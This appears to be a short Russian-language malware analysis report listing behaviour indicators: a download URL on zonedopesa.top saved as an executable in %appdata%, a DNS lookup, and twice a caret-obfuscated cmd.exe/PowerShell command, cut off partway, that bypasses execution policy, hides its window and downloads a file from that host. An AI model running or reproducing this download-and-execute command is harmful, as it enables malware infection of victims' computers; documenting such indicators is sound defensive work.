Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OWE^r^shELL.exE^ ^-^E^XEcuT^i^oNpOL^IcY BY^P^a^Ss -N^O^p^r^o^fILE ^-Wi^Ndo^WsT^YLe h^I^dD^en (New-oBj^E^c^t ^SysTEM.^ne^T.WebcLIent^).DowNloAd^fILe(^'http://www.zonedopes...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^OWE^r^shELL.exE^ ^-^E^XEcuT^i^oNpOL^IcY BY^P^a^Ss -N^O^p^r^o^fILE ^-Wi^Ndo^WsT^YLe h^I^dD^en (New-oBj^E^c^t ^SysTEM.^ne^T.WebcLIent^).DowNloAd^fILe(^'http://www.zonedopes...' (со скрытым окном)